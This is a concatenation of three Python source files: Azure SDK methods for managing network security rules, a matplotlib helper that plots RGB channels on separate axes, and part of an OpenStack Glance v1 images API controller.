_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
network_security_group_name, # type: str
security_rule_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified network security rule.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_security_group_name: The name of the network security group.
:type network_security_group_name: str
:param security_rule_name: The name of the security rule.
:type security_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
network_security_group_name=network_security_group_name,
security_rule_name=security_rule_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
network_security_group_name, # type: str
security_rule_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.SecurityRule"
"""Get the specified network security rule.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_security_group_name: The name of the network security group.
:type network_security_group_name: str
:param security_rule_name: The name of the security rule.
:type security_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SecurityRule, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2016_12_01.models.SecurityRule
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecurityRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-12-01"
accept = "application/json, text/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('SecurityRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
network_security_group_name, # type: str
security_rule_name, # type: str
security_rule_parameters, # type: "_models.SecurityRule"
**kwargs # type: Any
):
# type: (...) -> "_models.SecurityRule"
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecurityRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-12-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json, text/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(security_rule_parameters, 'SecurityRule')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('SecurityRule', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('SecurityRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
network_security_group_name, # type: str
security_rule_name, # type: str
security_rule_parameters, # type: "_models.SecurityRule"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.SecurityRule"]
"""Creates or updates a security rule in the specified network security group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_security_group_name: The name of the network security group.
:type network_security_group_name: str
:param security_rule_name: The name of the security rule.
:type security_rule_name: str
:param security_rule_parameters: Parameters supplied to the create or update network security
rule operation.
:type security_rule_parameters: ~azure.mgmt.network.v2016_12_01.models.SecurityRule
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either SecurityRule or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2016_12_01.models.SecurityRule]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecurityRule"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
network_security_group_name=network_security_group_name,
security_rule_name=security_rule_name,
security_rule_parameters=security_rule_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('SecurityRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
def list(
self,
resource_group_name, # type: str
network_security_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.SecurityRuleListResult"]
"""Gets all security rules in a network security group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_security_group_name: The name of the network security group.
:type network_security_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SecurityRuleListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2016_12_01.models.SecurityRuleListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecurityRuleListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-12-01"
accept = "application/json, text/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('SecurityRuleListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules'} # type: ignore
|
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from matplotlib.externals import six
import numpy as np
from .axes_divider import make_axes_locatable, Size, locatable_axes_factory
import sys
from .mpl_axes import Axes
def make_rgb_axes(ax, pad=0.01, axes_class=None, add_all=True):
"""
pad : fraction of the axes height.
"""
divider = make_axes_locatable(ax)
pad_size = Size.Fraction(pad, Size.AxesY(ax))
xsize = Size.Fraction((1.-2.*pad)/3., Size.AxesX(ax))
ysize = Size.Fraction((1.-2.*pad)/3., Size.AxesY(ax))
divider.set_horizontal([Size.AxesX(ax), pad_size, xsize])
divider.set_vertical([ysize, pad_size, ysize, pad_size, ysize])
ax.set_axes_locator(divider.new_locator(0, 0, ny1=-1))
ax_rgb = []
if axes_class is None:
try:
axes_class = locatable_axes_factory(ax._axes_class)
except AttributeError:
axes_class = locatable_axes_factory(type(ax))
for ny in [4, 2, 0]:
ax1 = axes_class(ax.get_figure(),
ax.get_position(original=True),
sharex=ax, sharey=ax)
locator = divider.new_locator(nx=2, ny=ny)
ax1.set_axes_locator(locator)
for t in ax1.yaxis.get_ticklabels() + ax1.xaxis.get_ticklabels():
t.set_visible(False)
try:
for axis in ax1.axis.values():
axis.major_ticklabels.set_visible(False)
except AttributeError:
pass
ax_rgb.append(ax1)
if add_all:
fig = ax.get_figure()
for ax1 in ax_rgb:
fig.add_axes(ax1)
return ax_rgb
def imshow_rgb(ax, r, g, b, **kwargs):
ny, nx = r.shape
R = np.zeros([ny, nx, 3], dtype="d")
R[:,:,0] = r
G = np.zeros_like(R)
G[:,:,1] = g
B = np.zeros_like(R)
B[:,:,2] = b
RGB = R + G + B
im_rgb = ax.imshow(RGB, **kwargs)
return im_rgb
class RGBAxesBase(object):
"""base class for a 4-panel imshow (RGB, R, G, B)
Layout:
+---------------+-----+
| | R |
+ +-----+
| RGB | G |
+ +-----+
| | B |
+---------------+-----+
Attributes
----------
_defaultAxesClass : matplotlib.axes.Axes
defaults to 'Axes' in RGBAxes child class.
No default in abstract base class
RGB : _defaultAxesClass
The axes object for the three-channel imshow
R : _defaultAxesClass
The axes object for the red channel imshow
G : _defaultAxesClass
The axes object for the green channel imshow
B : _defaultAxesClass
The axes object for the blue channel imshow
"""
def __init__(self, *kl, **kwargs):
"""
Parameters
----------
pad : float
fraction of the axes height to put as padding.
defaults to 0.0
add_all : bool
True: Add the {rgb, r, g, b} axes to the figure
defaults to True.
axes_class : matplotlib.axes.Axes
kl :
Unpacked into axes_class() init for RGB
kwargs :
Unpacked into axes_class() init for RGB, R, G, B axes
"""
pad = kwargs.pop("pad", 0.0)
add_all = kwargs.pop("add_all", True)
try:
axes_class = kwargs.pop("axes_class", self._defaultAxesClass)
except AttributeError:
new_msg = ("A subclass of RGBAxesBase must have a "
"_defaultAxesClass attribute. If you are not sure which "
"axes class to use, consider using "
"mpl_toolkits.axes_grid1.mpl_axes.Axes.")
six.reraise(AttributeError, AttributeError(new_msg),
sys.exc_info()[2])
ax = axes_class(*kl, **kwargs)
divider = make_axes_locatable(ax)
pad_size = Size.Fraction(pad, Size.AxesY(ax))
xsize = Size.Fraction((1.-2.*pad)/3., Size.AxesX(ax))
ysize = Size.Fraction((1.-2.*pad)/3., Size.AxesY(ax))
divider.set_horizontal([Size.AxesX(ax), pad_size, xsize])
divider.set_vertical([ysize, pad_size, ysize, pad_size, ysize])
ax.set_axes_locator(divider.new_locator(0, 0, ny1=-1))
ax_rgb = []
for ny in [4, 2, 0]:
ax1 = axes_class(ax.get_figure(),
ax.get_position(original=True),
sharex=ax, sharey=ax, **kwargs)
locator = divider.new_locator(nx=2, ny=ny)
ax1.set_axes_locator(locator)
ax1.axis[:].toggle(ticklabels=False)
ax_rgb.append(ax1)
self.RGB = ax
self.R, self.G, self.B = ax_rgb
if add_all:
fig = ax.get_figure()
fig.add_axes(ax)
self.add_RGB_to_figure()
self._config_axes()
def _config_axes(self, line_color='w', marker_edge_color='w'):
"""Set the line color and ticks for the axes
Parameters
----------
line_color : any matplotlib color
marker_edge_color : any matplotlib color
"""
for ax1 in [self.RGB, self.R, self.G, self.B]:
ax1.axis[:].line.set_color(line_color)
ax1.axis[:].major_ticks.set_markeredgecolor(marker_edge_color)
def add_RGB_to_figure(self):
"""Add the red, green and blue axes to the RGB composite's axes figure
"""
self.RGB.get_figure().add_axes(self.R)
self.RGB.get_figure().add_axes(self.G)
self.RGB.get_figure().add_axes(self.B)
def imshow_rgb(self, r, g, b, **kwargs):
"""Create the four images {rgb, r, g, b}
Parameters
----------
r : array-like
The red array
g : array-like
The green array
b : array-like
The blue array
kwargs : imshow kwargs
kwargs get unpacked into the imshow calls for the four images
Returns
-------
rgb : matplotlib.image.AxesImage
r : matplotlib.image.AxesImage
g : matplotlib.image.AxesImage
b : matplotlib.image.AxesImage
"""
ny, nx = r.shape
if not ((nx, ny) == g.shape == b.shape):
raise ValueError('Input shapes do not match.'
'\nr.shape = {}'
'\ng.shape = {}'
'\nb.shape = {}'
''.format(r.shape, g.shape, b.shape))
R = np.zeros([ny, nx, 3], dtype="d")
R[:,:,0] = r
G = np.zeros_like(R)
G[:,:,1] = g
B = np.zeros_like(R)
B[:,:,2] = b
RGB = R + G + B
im_rgb = self.RGB.imshow(RGB, **kwargs)
im_r = self.R.imshow(R, **kwargs)
im_g = self.G.imshow(G, **kwargs)
im_b = self.B.imshow(B, **kwargs)
return im_rgb, im_r, im_g, im_b
class RGBAxes(RGBAxesBase):
_defaultAxesClass = Axes
|
|
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
/images endpoint for Glance v1 API
"""
import copy
import eventlet
from oslo.config import cfg
import six.moves.urllib.parse as urlparse
from webob.exc import HTTPBadRequest
from webob.exc import HTTPConflict
from webob.exc import HTTPForbidden
from webob.exc import HTTPMethodNotAllowed
from webob.exc import HTTPNotFound
from webob.exc import HTTPRequestEntityTooLarge
from webob import Response
from glance.api import common
from glance.api import policy
import glance.api.v1
from glance.api.v1 import controller
from glance.api.v1 import filters
from glance.api.v1 import upload_utils
from glance.common import exception
from glance.common import property_utils
from glance.common import utils
from glance.common import wsgi
from glance import notifier
from glance.openstack.common import excutils
import glance.openstack.common.log as logging
from glance.openstack.common import strutils
import glance.registry.client.v1.api as registry
from glance.store import get_from_backend
from glance.store import get_known_schemes
from glance.store import get_known_stores
from glance.store import get_size_from_backend
from glance.store import get_store_from_location
from glance.store import get_store_from_scheme
from glance.store import validate_location
LOG = logging.getLogger(__name__)
SUPPORTED_PARAMS = glance.api.v1.SUPPORTED_PARAMS
SUPPORTED_FILTERS = glance.api.v1.SUPPORTED_FILTERS
ACTIVE_IMMUTABLE = glance.api.v1.ACTIVE_IMMUTABLE
CONF = cfg.CONF
CONF.import_opt('disk_formats', 'glance.common.config', group='image_format')
CONF.import_opt('container_formats', 'glance.common.config',
group='image_format')
CONF.import_opt('image_property_quota', 'glance.common.config')
def validate_image_meta(req, values):
name = values.get('name')
disk_format = values.get('disk_format')
container_format = values.get('container_format')
if 'disk_format' in values:
if disk_format not in CONF.image_format.disk_formats:
msg = _("Invalid disk format '%s' for image.") % disk_format
raise HTTPBadRequest(explanation=msg, request=req)
if 'container_format' in values:
if container_format not in CONF.image_format.container_formats:
msg = _("Invalid container format '%s' "
"for image.") % container_format
raise HTTPBadRequest(explanation=msg, request=req)
if name and len(name) > 255:
msg = _('Image name too long: %d') % len(name)
raise HTTPBadRequest(explanation=msg, request=req)
amazon_formats = ('aki', 'ari', 'ami')
if disk_format in amazon_formats or container_format in amazon_formats:
if disk_format is None:
values['disk_format'] = container_format
elif container_format is None:
values['container_format'] = disk_format
elif container_format != disk_format:
msg = (_("Invalid mix of disk and container formats. "
"When setting a disk or container format to "
"one of 'aki', 'ari', or 'ami', the container "
"and disk formats must match."))
raise HTTPBadRequest(explanation=msg, request=req)
return values
def redact_loc(image_meta, copy_dict=True):
"""
Create a shallow copy of image meta with 'location' removed
for security (as it can contain credentials).
"""
if copy_dict:
new_image_meta = copy.copy(image_meta)
else:
new_image_meta = image_meta
new_image_meta.pop('location', None)
new_image_meta.pop('location_data', None)
return new_image_meta
class Controller(controller.BaseController):
"""
WSGI controller for images resource in Glance v1 API
The images resource API is a RESTful web service for image data. The API
is as follows::
GET /images -- Returns a set of brief metadata about images
GET /images/detail -- Returns a set of detailed metadata about
images
HEAD /images/<ID> -- Return metadata about an image with id <ID>
GET /images/<ID> -- Return image data for image with id <ID>
POST /images -- Store image data and return metadata about the
newly-stored image
PUT /images/<ID> -- Update image metadata and/or upload image
data for a previously-reserved image
DELETE /images/<ID> -- Delete the image with id <ID>
"""
def __init__(self):
self.notifier = notifier.Notifier()
registry.configure_registry_client()
self.policy = policy.Enforcer()
self.pool = eventlet.GreenPool(size=1024)
if property_utils.is_property_protection_enabled():
self.prop_enforcer = property_utils.PropertyRules(self.policy)
else:
self.prop_enforcer = None
def _enforce(self, req, action):
"""Authorize an action against our policies"""
try:
self.policy.enforce(req.context, action, {})
except exception.Forbidden:
raise HTTPForbidden()
def _enforce_image_property_quota(self,
image_meta,
orig_image_meta=None,
purge_props=False,
req=None):
if CONF.image_property_quota < 0:
# If value is negative, allow unlimited number of properties
return
props = image_meta['properties'].keys()
# NOTE(ameade): If we are not removing existing properties,
# take them in to account
if (not purge_props) and orig_image_meta:
original_props = orig_image_meta['properties'].keys()
props.extend(original_props)
props = set(props)
if len(props) > CONF.image_property_quota:
msg = (_("The limit has been exceeded on the number of allowed "
"image properties. Attempted: %(num)s, Maximum: "
"%(quota)s") % {'num': len(props),
'quota': CONF.image_property_quota})
LOG.info(msg)
raise HTTPRequestEntityTooLarge(explanation=msg,
request=req,
content_type="text/plain")
def _enforce_create_protected_props(self, create_props, req):
"""
Check request is permitted to create certain properties
:param create_props: List of properties to check
:param req: The WSGI/Webob Request object
:raises HTTPForbidden if request forbidden to create a property
"""
if property_utils.is_property_protection_enabled():
for key in create_props:
if (self.prop_enforcer.check_property_rules(
key, 'create', req.context) is False):
msg = "Property '%s' is protected" % key
LOG.debug(msg)
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
def _enforce_read_protected_props(self, image_meta, req):
"""
Remove entries from metadata properties if they are read protected
:param image_meta: Mapping of metadata about image
:param req: The WSGI/Webob Request object
"""
if property_utils.is_property_protection_enabled():
for key in image_meta['properties'].keys():
if (self.prop_enforcer.check_property_rules(
key, 'read', req.context) is False):
image_meta['properties'].pop(key)
def _enforce_update_protected_props(self, update_props, image_meta,
orig_meta, req):
"""
Check request is permitted to update certain properties. Read
permission is required to delete a property.
If the property value is unchanged, i.e. a noop, it is permitted,
however, it is important to ensure read access first. Otherwise the
value could be discovered using brute force.
:param update_props: List of properties to check
:param image_meta: Mapping of proposed new metadata about image
:param orig_meta: Mapping of existing metadata about image
:param req: The WSGI/Webob Request object
:raises HTTPForbidden if request forbidden to create a property
"""
if property_utils.is_property_protection_enabled():
for key in update_props:
has_read = self.prop_enforcer.check_property_rules(
key, 'read', req.context)
if ((self.prop_enforcer.check_property_rules(
key, 'update', req.context) is False and
image_meta['properties'][key] !=
orig_meta['properties'][key]) or not has_read):
msg = "Property '%s' is protected" % key
LOG.debug(msg)
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
def _enforce_delete_protected_props(self, delete_props, image_meta,
orig_meta, req):
"""
Check request is permitted to delete certain properties. Read
permission is required to delete a property.
Note, the absence of a property in a request does not necessarily
indicate a delete. The requester may not have read access, and so can
not know the property exists. Hence, read access is a requirement for
delete, otherwise the delete is ignored transparently.
:param delete_props: List of properties to check
:param image_meta: Mapping of proposed new metadata about image
:param orig_meta: Mapping of existing metadata about image
:param req: The WSGI/Webob Request object
:raises HTTPForbidden if request forbidden to create a property
"""
if property_utils.is_property_protection_enabled():
for key in delete_props:
if (self.prop_enforcer.check_property_rules(
key, 'read', req.context) is False):
# NOTE(bourke): if read protected, re-add to image_meta to
# prevent deletion
image_meta['properties'][key] = \
orig_meta['properties'][key]
elif (self.prop_enforcer.check_property_rules(
key, 'delete', req.context) is False):
msg = "Property '%s' is protected" % key
LOG.debug(msg)
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
def index(self, req):
"""
Returns the following information for all public, available images:
* id -- The opaque image identifier
* name -- The name of the image
* disk_format -- The disk image format
* container_format -- The "container" format of the image
* checksum -- MD5 checksum of the image data
* size -- Size of image data in bytes
:param req: The WSGI/Webob Request object
:retval The response body is a mapping of the following form::
{'images': [
{'id': <ID>,
'name': <NAME>,
'disk_format': <DISK_FORMAT>,
'container_format': <DISK_FORMAT>,
'checksum': <CHECKSUM>
'size': <SIZE>}, ...
]}
"""
self._enforce(req, 'get_images')
params = self._get_query_params(req)
try:
images = registry.get_images_list(req.context, **params)
except exception.Invalid as e:
raise HTTPBadRequest(explanation="%s" % e)
return dict(images=images)
def detail(self, req):
"""
Returns detailed information for all available images
:param req: The WSGI/Webob Request object
:retval The response body is a mapping of the following form::
{'images': [
{'id': <ID>,
'name': <NAME>,
'size': <SIZE>,
'disk_format': <DISK_FORMAT>,
'container_format': <CONTAINER_FORMAT>,
'checksum': <CHECKSUM>,
'min_disk': <MIN_DISK>,
'min_ram': <MIN_RAM>,
'store': <STORE>,
'status': <STATUS>,
'created_at': <TIMESTAMP>,
'updated_at': <TIMESTAMP>,
'deleted_at': <TIMESTAMP>|<NONE>,
'properties': {'distro': 'Ubuntu 10.04 LTS', ...}}, ...
]}
"""
if req.method == 'HEAD':
msg = (_("This operation is currently not permitted on "
"Glance images details."))
raise HTTPMethodNotAllowed(explanation=msg,
headers={'Allow': 'GET'},
body_template='${explanation}')
self._enforce(req, 'get_images')
params = self._get_query_params(req)
try:
images = registry.get_images_detail(req.context, **params)
# Strip out the Location attribute. Temporary fix for
# LP Bug #755916. This information is still coming back
# from the registry, since the API server still needs access
# to it, however we do not return this potential security
# information to the API end user...
for image in images:
redact_loc(image, copy_dict=False)
self._enforce_read_protected_props(image, req)
except exception.Invalid as e:
raise HTTPBadRequest(explanation="%s" % e)
return dict(images=images)
def _get_query_params(self, req):
"""
Extracts necessary query params from request.
:param req: the WSGI Request object
:retval dict of parameters that can be used by registry client
"""
params = {'filters': self._get_filters(req)}
for PARAM in SUPPORTED_PARAMS:
if PARAM in req.params:
params[PARAM] = req.params.get(PARAM)
# Fix for LP Bug #1132294
# Ensure all shared images are returned in v1
params['member_status'] = 'all'
return params
def _get_filters(self, req):
"""
Return a dictionary of query param filters from the request
:param req: the Request object coming from the wsgi layer
:retval a dict of key/value filters
"""
query_filters = {}
for param in req.params:
if param in SUPPORTED_FILTERS or param.startswith('property-'):
query_filters[param] = req.params.get(param)
if not filters.validate(param, query_filters[param]):
raise HTTPBadRequest(_('Bad value passed to filter '
'%(filter)s got %(val)s')
% {'filter': param,
'val': query_filters[param]})
return query_filters
def meta(self, req, id):
"""
Returns metadata about an image in the HTTP headers of the
response object
:param req: The WSGI/Webob Request object
:param id: The opaque image identifier
:retval similar to 'show' method but without image_data
:raises HTTPNotFound if image metadata is not available to user
"""
self._enforce(req, 'get_image')
image_meta = self.get_image_meta_or_404(req, id)
image_meta = redact_loc(image_meta)
self._enforce_read_protected_props(image_meta, req)
return {
'image_meta': image_meta
}
@staticmethod
def _validate_source(source, req):
"""
External sources (as specified via the location or copy-from headers)
are supported only over non-local store types, i.e. S3, Swift, HTTP.
Note the absence of file:// for security reasons, see LP bug #942118.
If the above constraint is violated, we reject with 400 "Bad Request".
"""
if source:
pieces = urlparse.urlparse(source)
schemes = [scheme for scheme in get_known_schemes()
if scheme != 'file']
for scheme in schemes:
if pieces.scheme == scheme:
return source
msg = "External sourcing not supported for store %s" % source
LOG.debug(msg)
raise HTTPBadRequest(explanation=msg,
request=req,
content_type="text/plain")
@staticmethod
def _copy_from(req):
return req.headers.get('x-glance-api-copy-from')
def _external_source(self, image_meta, req):
source = image_meta.get('location')
if source is not None:
self._enforce(req, 'set_image_location')
else:
source = Controller._copy_from(req)
return Controller._validate_source(source, req)
@staticmethod
def _get_from_store(context, where):
try:
image_data, image_size = get_from_backend(context, where)
except exception.NotFound as e:
raise HTTPNotFound(explanation=e.msg)
image_size = int(image_size) if image_size else None
return image_data, image_size
def show(self, req, id):
"""
Returns an iterator that can be used to retrieve an image's
data along with the image metadata.
:param req: The WSGI/Webob Request object
:param id: The opaque image identifier
:raises HTTPNotFound if image is not available to user
"""
self._enforce(req, 'get_image')
self._enforce(req, 'download_image')
image_meta = self.get_active_image_meta_or_404(req, id)
self._enforce_read_protected_props(image_meta, req)
if image_meta.get('size') == 0:
image_iterator = iter([])
else:
image_iterator, size = self._get_from_store(req.context,
image_meta['location'])
image_iterator = utils.cooperative_iter(image_iterator)
image_meta['size'] = size or image_meta['size']
image_meta = redact_loc(image_meta)
return {
'image_iterator': image_iterator,
'image_meta': image_meta,
}
def _reserve(self, req, image_meta):
"""
Adds the image metadata to the registry and assigns
an image identifier if one is not supplied in the request
headers. Sets the image's status to `queued`.
:param req: The WSGI/Webob Request object
:param id: The opaque image identifier
:param image_meta: The image metadata
:raises HTTPConflict if image already exists
:raises HTTPBadRequest if image metadata is not valid
"""
location = self._external_source(image_meta, req)
store = image_meta.get('store')
if store and store not in get_known_stores():
msg = "Required store %s is invalid" % store
LOG.debug(msg)
raise HTTPBadRequest(explanation=msg,
content_type='text/plain')
image_meta['status'] = ('active' if image_meta.get('size') == 0
else 'queued')
if location:
try:
store = get_store_from_location(location)
